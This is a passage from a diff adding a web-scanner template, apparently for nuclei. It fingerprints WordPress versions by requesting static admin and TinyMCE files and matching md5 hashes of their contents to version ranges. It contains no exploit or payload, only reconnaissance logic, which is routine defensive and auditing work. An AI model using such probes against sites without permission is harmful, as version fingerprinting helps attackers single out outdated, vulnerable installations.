== md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"c4f665635b50712ceeffcfe96419c116\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/user-profile.min.js" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"78429754e565545b0b996d327eb9b75a\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"c4a664eec9fe972ffa4f58a9932a6ba1\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"17c1c548cb9f35ba6c1eaa48ee95ccb7\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"bb06b01380b31741cc3c6bb0475fa15e\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"dea7394c000c199f8d9d89d19e4c7ab4\" == md5(body))" + - type: dsl + name: 4.3.1 - 4.3.25 + dsl: + - "(\"bae9b3c21bbed3ac23a9f2ed67352c25\" == md5(body))" + - type: dsl + name: 4.3 + dsl: + - "(\"d990a5a8ca17c099a994cce6fc99a63e\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"6a1e4023a877503c50771b02f2d332c2\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"61e1a5c632622df1af36a7a51ac4f53f\" == md5(body))" + - type: dsl 
+ name: 3.9 - 4.0.32 + dsl: + - "(\"62c815e5f66e17e046de2817a1af9f93\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.33 + dsl: + - "(\"965a6c8c3c3e7df5310416a86ac60eb2\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.33 + dsl: + - "(\"9eacd99637638c1827a085823204b32a\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"8d2bdb3746a32cf6584131f1cf8862e9\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"ec11a68b00ee850bd0b91ae99d11c0b3\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"c3bf88f3c7cdb2017fef61ed1bd09a50\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"c55941aa864653e8b3de814015477f61\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"b37c7bd0f42bb0a077cdb5b5c8e15ec1\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"9f3731a955a2d8b3a31350a427b33898\" == md5(body))" + - type: dsl + name: 3.8.34 - 3.8.35 + dsl: + - "(\"fc08122eeaee48c3b094db0a1a249c25\" == md5(body))" + - type: dsl + name: 3.7.34 - 3.7.35 + dsl: + - "(\"a4f0e2f9a98726f3451c112c4a748650\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"bdb82a2554a8e05100eee4f970368d75\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"63cd350aa533120f942fb6817e1b8742\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/widgets.min.js" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"a845b846f7528f379cbfd59cbdc679f0\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"0cc751acbd9d40cfe25f0a5520899326\" == md5(body))" + - type: dsl + name: 4.4 - 4.6.20 + dsl: + - "(\"49e447a9a0db3e5863d67226c76d8168\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"aafed3503241acd9e063d0f22b8aaddf\" == md5(body))" + - type: dsl + name: 4.2.3 - 4.2.29 + dsl: + - "(\"e16e4c79756636ad6fb531df4c666a4d\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.2 + dsl: + - "(\"4c2c339725d1719abe9809b79e89d390\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + 
dsl: + - "(\"7f96038b9537a8fe2a8887a4a4893737\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"1f3b6b178975e8714428fb922fb7522a\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"c9065688eeaa24604f824846ae4210fa\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.33 + dsl: + - "(\"a80ddc28df4b919043da8a96106b1661\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.33 + dsl: + - "(\"c66c6985d272f6f4a4dfc947b8a132ed\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"864ec11903d550ceea82e36ba4396a26\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.2 + dsl: + - "(\"c6422380faa3101cb73ccccbdefab150\" == md5(body))" + - type: dsl + name: 4.9.3 - 5.0.11 + dsl: + - "(\"de756f5669035c3590ed9d4da7773a72\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.9 + dsl: + - "(\"08807467493793aa5fc03fcd3cae128c\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"95405e5d6077252bee8a3e9e84d10580\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"3198ef3ad593013cf4756fe386035642\" == md5(body))" + - type: dsl + name: 3.8.34 - 3.8.35 + dsl: + - "(\"3903fb387a3c849e3369c0a2095706a7\" == md5(body))" + - type: dsl + name: 3.7.34 - 3.7.35 + dsl: + - "(\"ecab48a35fecb8b065c069c1ca5f9084\" == md5(body))" + - type: dsl + name: 5.5 + dsl: + - "(\"b2afc744816a8319329b934ecf6051b0\" == md5(body))" + - type: dsl + name: 5.5.1 - 5.5.3 + dsl: + - "(\"6111294391a90e6a53ec6c367125d532\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"4512074a55d94d3becd197a007e3fe19\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/colors/ectoplasm/colors-rtl.min.css" + matchers: + - type: dsl + name: 4.7 - 4.8.15 + dsl: + - "(\"1e5ae890a49af4d069a4f732d85b1de3\" == md5(body))" + - type: dsl + name: 4.5 - 4.6.20 + dsl: + - "(\"ff964251f91913de2c95d166fa9f910d\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"96c9eb1807f5271e0e1a1b279f738b78\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - 
"(\"8581d6918e5aec966962ff88b92b7515\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"6f85716a47597c040d5549bbd61ff927\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"1a67509c005453afa0cd06dbe22937a7\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.26 + dsl: + - "(\"55cda4394e062bb9e6c5dfe7565a83fb\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"111154e25e5c8143f4e20a6e80b8a755\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.30 + dsl: + - "(\"d148388c28a8d4c3b25b4c669849067f\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"36a186d038c83593e79d1a0cc8876bc4\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"9fd24eac5fad7af9e94d352633d54b33\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"10d404c76bf37fd787385e5d896247f1\" == md5(body))" + - type: dsl + name: 4.0.27 - 4.0.32 + dsl: + - "(\"13f22ddd59ffbf4d41b6c2dede462d9b\" == md5(body))" + - type: dsl + name: 3.8.31 - 3.8.35 + dsl: + - "(\"8e32de701588a0be6c747cb7ae197c8d\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"d5678d078044d2a8f86cc3a6606ef1cf\" == md5(body))" + - type: dsl + name: 5.3.2 - 5.4.4 + dsl: + - "(\"a4e0dd8fcafad10276caad5790a642fe\" == md5(body))" + - type: dsl + name: 5.3.1 + dsl: + - "(\"8864a06ee8c86c6c1921c90583616c83\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"112366dc16e2df4d5b1aba549817daeb\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/colors/ectoplasm/colors.min.css" + matchers: + - type: dsl + name: 4.7 - 4.8.15 + dsl: + - "(\"3c121862a0ba5b3bd489d428cc926624\" == md5(body))" + - type: dsl + name: 4.5 - 4.6.20 + dsl: + - "(\"435a0d93eeca88b2d78d085931d35c2b\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"86d2fb3ee504d7846bc973f0bad27fad\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"dea6294c84c0d202c84e256b1693da9d\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - 
"(\"d392ab4aa1d7ba0fc2c7538e62b30448\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"22727a1ae25ad30d8dfce6cb130e58da\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.26 + dsl: + - "(\"c6e030f06fac0338cb5b9e5ddb9e5ff2\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"c45bf2fc4b5a7acedf6e45aa1470c3e4\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.30 + dsl: + - "(\"23305501a9d59a48c6e715a84624bad3\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"fc7c114669f52b57e6ba46c66dfd1525\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"f66fb1ef1527ce106614d6e75045b7cb\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"c5783608b75e6c0d2471d588dd6bb508\" == md5(body))" + - type: dsl + name: 4.0.27 - 4.0.32 + dsl: + - "(\"dcfa49b5d519db45ec284e6ea7049fc1\" == md5(body))" + - type: dsl + name: 3.8.31 - 3.8.35 + dsl: + - "(\"ce04388f7af80c6a43b3c259792dd813\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"45acce186fc7ed6edf6a836f996f2c75\" == md5(body))" + - type: dsl + name: 5.3.2 - 5.4.4 + dsl: + - "(\"72046a12cb11f7721bcb3a628cb980a1\" == md5(body))" + - type: dsl + name: 5.3.1 + dsl: + - "(\"4c84116c8b3a99ae8ae04d6ed5898931\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"089347821c45845393ce4abc0dff439f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/colors/coffee/colors-rtl.min.css" + matchers: + - type: dsl + name: 4.7 - 4.8.15 + dsl: + - "(\"f867fd7adccd1ecdf764739053a6ec2a\" == md5(body))" + - type: dsl + name: 4.5 - 4.6.20 + dsl: + - "(\"663ac9c63302bc5276bbab270f1c0424\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"633688047d2552c2036369c8df1e9dfe\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"865c41c44ac51f501ee2fe2307950b26\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"fc48153c9c53bf2d871067cbfca6c8c4\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - 
"(\"eb4cd2c841fb222e136b5e7b891aea12\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.26 + dsl: + - "(\"768a93266f3c54b24f0bb06f4fde09c1\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"2d464c6a8cd405d1fa8671f1a4d1f068\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.30 + dsl: + - "(\"2e8fd5fd620c08c18f382baaf820c219\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"4ed4244ba484a49d295fa48d29957533\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"a28c37418e809a0ece5656740522adcb\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"592d60de5e62336b3958d4975b39a9b4\" == md5(body))" + - type: dsl + name: 4.0.27 - 4.0.32 + dsl: + - "(\"900a4b2dca39d52e01e5138aa5dacc32\" == md5(body))" + - type: dsl + name: 3.8.31 - 3.8.35 + dsl: + - "(\"a7cdb166af4da3afc9665deda6861f0c\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"610bf6b6680e2318c777cbfa5b0fe613\" == md5(body))" + - type: dsl + name: 5.3.2 - 5.4.4 + dsl: + - "(\"bd4405a8496e1b998699be2712184241\" == md5(body))" + - type: dsl + name: 5.3.1 + dsl: + - "(\"4dd2798490887d9026d44f2bea822fe1\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"3a7cb6aeafb59c79c618e00078a42df7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/colors/coffee/colors.min.css" + matchers: + - type: dsl + name: 4.7 - 4.8.15 + dsl: + - "(\"a585d4eb32332d90b23f792312bc4d8a\" == md5(body))" + - type: dsl + name: 4.5 - 4.6.20 + dsl: + - "(\"98fb96ff87f6948275e2acd843db28ad\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"68cf9b8927067500035c727ed340fea1\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"16ae38eb245d0aa76cfa9428044afcc9\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"c8796229a84fa15d28de61c772a0d67a\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"e2f1b66e798b73956910c7f2d8f52893\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.26 + dsl: + - 
"(\"2fe17baa6ece60bce123d487f4e528e7\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"a355c6b1db46c2bc2676b24171585813\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.30 + dsl: + - "(\"f085870c70630c872c3d92792417ff73\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"af368ebb8350419c26769db1ab139778\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"5c2e0a8064d1714f511c0b1ff36cf592\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"395a6f36dbe8b376727438dbe52ced3e\" == md5(body))" + - type: dsl + name: 4.0.27 - 4.0.32 + dsl: + - "(\"7ff2e69433e8d79b333826ab10b4cbe4\" == md5(body))" + - type: dsl + name: 3.8.31 - 3.8.35 + dsl: + - "(\"a43eea2612ccc7873ff1394e940acf93\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"3053c3f6ef0a6dbf7e72b9329b54412c\" == md5(body))" + - type: dsl + name: 5.3.2 - 5.4.4 + dsl: + - "(\"4182df9ec161b300cf221e37d3a3dddf\" == md5(body))" + - type: dsl + name: 5.3.1 + dsl: + - "(\"2b83cfa858228147b6ec893e079e4c95\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"7e639ed3a2651581aa26e0c4f67f497c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/colors/blue/colors-rtl.min.css" + matchers: + - type: dsl + name: 4.7 - 4.8.15 + dsl: + - "(\"d76e3f993f962326e6a2336db75d3fd6\" == md5(body))" + - type: dsl + name: 4.5 - 4.6.20 + dsl: + - "(\"0c54b9433982ac1434c48071143bc050\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"fe0277eddd6929335c49e93666773745\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"ae72be7c678881355fa484ebb34f76bf\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"a3ef984189150a8810a060747213016b\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"8564e463d51205a7ba81fc3dbf47534c\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.26 + dsl: + - "(\"715d5354e62c3137906fa6f108e3f09c\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - 
"(\"9f99945db6de77cbea0b45d8152bacd7\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.30 + dsl: + - "(\"14f3c0690120de73693ff29bcecc80d6\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"760a83d1bd8de7952c213a668151bce6\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"41f278bf580d299962fb0228d5b3c789\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"e7fbcea7585a697767b2615aadc4c414\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"30a856e5af5b41d6a2799e262b3f9a24\" == md5(body))" + - type: dsl + name: 4.0.27 - 4.0.32 + dsl: + - "(\"f8b5aa839f60572eb185cd1d148e0875\" == md5(body))" + - type: dsl + name: 3.8.31 - 3.8.35 + dsl: + - "(\"5f63b36275e6d513b4b798700f721a2a\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"0e9f1d4a2fa8f8a7ae62a302e0fd2869\" == md5(body))" + - type: dsl + name: 5.3.2 - 5.4.4 + dsl: + - "(\"c9d0a313c14133dae9c0e10a6b85e6b2\" == md5(body))" + - type: dsl + name: 5.3.1 + dsl: + - "(\"f234606ce89828be50f39b60ef02995e\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"e6ed4125ccd101db2623aa046b627e1a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/colors/blue/colors.min.css" + matchers: + - type: dsl + name: 4.7 - 4.8.15 + dsl: + - "(\"835228f437b76cb4336fd2db1841a984\" == md5(body))" + - type: dsl + name: 4.5 - 4.6.20 + dsl: + - "(\"fb4d3e2f7fe955aea70becac4602f87f\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"dd77d909ddd0981a03cd1bcb90d2a56a\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"b05bd2b90583cd670ef66e4fbd08c12e\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"998f2d1f4b8565cb04f4c28a3a38b611\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"09ba9aa3753dfc6aaa747e46172d7f0c\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.26 + dsl: + - "(\"bff3966d07076edaf48befe021c4112b\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - 
"(\"d0afb2116a3269ab63042023468df1ec\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.30 + dsl: + - "(\"96d22d6d37853b50c7cfab8dd7aa37e8\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"58b52e0c8528d52e040b8355a02eee77\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"9871ee227143cdee76b565c2ce1c23f5\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"476bd860a10099a51548fabfd11ac23a\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"f76dbe0a0a5fb610dd13cce233ed9108\" == md5(body))" + - type: dsl + name: 4.0.27 - 4.0.32 + dsl: + - "(\"cccef716d8a07781c8730efeaa4955d6\" == md5(body))" + - type: dsl + name: 3.8.31 - 3.8.35 + dsl: + - "(\"fc23b2d4a231aba890926986f716ad05\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"e99f9ad98677585817cb3ed25b652b58\" == md5(body))" + - type: dsl + name: 5.3.2 - 5.4.4 + dsl: + - "(\"cb3ad1540b2fc42920d8be3f0b64609c\" == md5(body))" + - type: dsl + name: 5.3.1 + dsl: + - "(\"7a6af6bc5f5ebaa62ea4024bda139a0e\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"3584a97822fec470bd8afd83efdd3d56\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/colors/_admin.scss" + matchers: + - type: dsl + name: 4.8 - 5.0.11 + dsl: + - "(\"c22ff1bb2db45ee3879ba234761ba618\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"bd2094e9dc3209e839476eba00ff5838\" == md5(body))" + - type: dsl + name: 4.5 - 4.6.20 + dsl: + - "(\"337df7168a4b60669c23c4b0343d72a8\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"9f7fb552eed012f6ea9ef1807ccf2e60\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"073d4e2e9dce085364cba7b11dcafa8b\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"a3dbce149457e880a29693684cecd425\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"8be2b9d1eeaaeb053236de49c0b3efcd\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - 
"(\"8ad8833b60497ab34c3df89ca124785d\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"1cd09416a8c94906605e085b32a00d20\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"bfb602edbb43601f02ce23ae875d3976\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"5d6d79bf1a1df7daffd0f4f5844cebb9\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"7314d06c13a9db49cb81aadf88441ce7\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"a9e98570b0d4b719f968de907dbebc1e\" == md5(body))" + - type: dsl + name: 5.3.2 - 5.4.4 + dsl: + - "(\"4d7f7857bc064daeb85cad30ff0feeab\" == md5(body))" + - type: dsl + name: 5.3.1 + dsl: + - "(\"91253f7e866f844f0bd47a0630a3d30f\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"a8720b36ac7c97fe0d3fee37b081c316\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/modern/theme.min.js" + matchers: + - type: dsl + name: 4.8 - 4.9.5 + dsl: + - "(\"75c97923eb04944e60b3659633f6fc8f\" == md5(body))" + - type: dsl + name: 4.7.4 - 4.7.19 + dsl: + - "(\"020976230a9fcdc90ebc06144dcb9865\" == md5(body))" + - type: dsl + name: 4.6 - 4.7.3 + dsl: + - "(\"e3b7cec28cad5caa5fcbcc2a15cebae7\" == md5(body))" + - type: dsl + name: 4.5.1 - 4.5.23 + dsl: + - "(\"d078eb835693e2b90baa5522cc807ec1\" == md5(body))" + - type: dsl + name: 4.5 + dsl: + - "(\"506dd1713e3fc6ed3de0c00867c4dfaa\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"73e129875cecb80849c9d37a223e48b6\" == md5(body))" + - type: dsl + name: 4.3.1 - 4.3.25 + dsl: + - "(\"a9c521859ff01e0528336828800db2cf\" == md5(body))" + - type: dsl + name: 4.3 + dsl: + - "(\"d0d8223ac24917740b2f0f2423bf3410\" == md5(body))" + - type: dsl + name: 4.1 - 4.2.29 + dsl: + - "(\"564c5df5e7f98ae88d546732251aeab2\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"2ad1417fd25d61b5feb5e18cd3be2494\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - 
"(\"03e3c162d0ca7ec600d185c193234660\" == md5(body))" + - type: dsl + name: 4.9.6 - 4.9.7 + dsl: + - "(\"5eaa758e147eb8c84507d2671cb0eb3a\" == md5(body))" + - type: dsl + name: 4.9.8 - 5.0.11 + dsl: + - "(\"7a36834309f0b8ef510bccb53d832943\" == md5(body))" + - type: dsl + name: 5.1 - 5.2 + dsl: + - "(\"af3b295e3eed46ece77323d00021090b\" == md5(body))" + - type: dsl + name: 5.2.1 - 5.2.9 + dsl: + - "(\"6ffeeca19829c98e1da5d5496fe415db\" == md5(body))" + - type: dsl + name: 5.3 - 5.4.4 + dsl: + - "(\"ee75ddd3e6a9b205b105d05e9dac72d1\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"558edbf6c845c9c87cd268285a0666b3\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/modern/theme.js" + matchers: + - type: dsl + name: 4.8 - 4.9.5 + dsl: + - "(\"caacfdd9b26dbae208eef5381e753eea\" == md5(body))" + - type: dsl + name: 4.7.4 - 4.7.19 + dsl: + - "(\"e873cd5a3ac205304d4f48b8d106aa35\" == md5(body))" + - type: dsl + name: 4.6 - 4.7.3 + dsl: + - "(\"d502a6ac28bb48a7d91a89ba9b5710c0\" == md5(body))" + - type: dsl + name: 4.5.1 - 4.5.23 + dsl: + - "(\"0de9115a54b3867ca975c9f1bff8225c\" == md5(body))" + - type: dsl + name: 4.5 + dsl: + - "(\"48e1bb77c2ec2cdbb321e12a95fdf425\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"3da8f8fb91d3c79f2cd499944aa42737\" == md5(body))" + - type: dsl + name: 4.3.1 - 4.3.25 + dsl: + - "(\"7b4a867a84575f7d26a9377b1eae7cbf\" == md5(body))" + - type: dsl + name: 4.3 + dsl: + - "(\"76569bb2afef83f696d146f1515d7308\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"3cda8e27d12c73c9046250803b1153e0\" == md5(body))" + - type: dsl + name: 4.0 - 4.1.32 + dsl: + - "(\"2f8cf087f0fd2648120054fde841f7cb\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"997db40f21c0f2249e96aad261d2db65\" == md5(body))" + - type: dsl + name: 4.9.6 - 4.9.7 + dsl: + - "(\"fb330860e2aff1f458e129ba84ea1fbb\" == md5(body))" + - type: dsl + name: 4.9.8 - 5.0.11 + dsl: + - 
"(\"0cd9fdee0a27d28e107936ef56e4e24f\" == md5(body))" + - type: dsl + name: 5.1 - 5.2 + dsl: + - "(\"0e50bcfc23e66938c5585ce303105cf2\" == md5(body))" + - type: dsl + name: 5.2.1 - 5.2.9 + dsl: + - "(\"94a15198144af9962df61ed927e23f1b\" == md5(body))" + - type: dsl + name: 5.3 - 5.4.4 + dsl: + - "(\"148b19d02f928ae66fed91adb39f66c9\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"efb528339d6fde55ea32c59d558a3299\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/paste/plugin.min.js" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"a649bd59c1d607b782a38ab372f20ca3\" == md5(body))" + - type: dsl + name: 4.7.4 - 4.7.19 + dsl: + - "(\"38d2137a5518e2bc7a88b4bf35c4ffca\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.3 + dsl: + - "(\"69a65927466dab834f5d48c28c8c23bb\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"64239ce0c6d44c0eaf09e6fd5ba672c2\" == md5(body))" + - type: dsl + name: 4.5.1 - 4.5.23 + dsl: + - "(\"733e85bf06990e86e4892d75759eae1b\" == md5(body))" + - type: dsl + name: 4.5 + dsl: + - "(\"1d72974d4431f1558f0be213ecf4b3f6\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"6ad28c2bb29efea8d198bab7e5354439\" == md5(body))" + - type: dsl + name: 4.3.1 - 4.3.25 + dsl: + - "(\"d41da4c3b9d07e54055ad9ab13b9112b\" == md5(body))" + - type: dsl + name: 4.3 + dsl: + - "(\"4bcf636bad04e64f10be7003828c210e\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"f0293e817c1dae4b042a1a1d6248b007\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"720418167ced7d4e1633fb64ba3d390f\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"dadc44587098d38d2ad483eb1d828212\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"b48d16a6a96856b9d1404cdef5240187\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.5 + dsl: + - "(\"3986deb1875d68d2ddc2ca9480c43467\" == md5(body))" + - type: dsl + name: 4.9.6 - 4.9.7 + dsl: + - 
